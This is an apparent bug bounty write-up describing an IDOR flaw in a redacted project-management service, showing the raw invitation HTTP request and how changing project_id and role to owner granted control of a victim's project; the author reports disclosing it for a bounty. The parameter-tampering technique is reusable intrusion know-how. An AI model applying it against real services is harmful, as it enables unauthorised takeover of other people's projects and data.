IDOR Leads To Project Takeover

It's all about Changes

Hi Guys,

This is my second bug bounty write up of how i managed to takeover a victims project using collaboration Invite.

A redacted.com is running a online project management service and people can post comments,images,files etc of their work on a single project. The admin of the project can add users as collaborators of the project.

The request of the collaboration invite was like this..

POST /project_api/project_invitation HTTP/1.1
Host: redacted.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://redacted.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 121
Connection: close
x_token=748f5bba976e3a202a7dbfa939271cde11e260fa52b7bbe4f3a024d80d08df92&project_id=5401234&role=1&emails=test%40test.com

And when i saw the request i thought..What If I

So we have 3 Request Parameters:

project_id=
role=
emails=

I Changed the request to:

project_id= Victims Project ID
role=0 (0=Owner, 1=Editor)
emails= My Email

I forwarded the request and ..

Checked my inbox and there it was ..A Collaboration Invite to the victims project as a owner . I was able to edit, delete, add more users, remove the original owner of the project etc

And i was like

I immediately reported the bug and recieved a good 3 digit bounty :)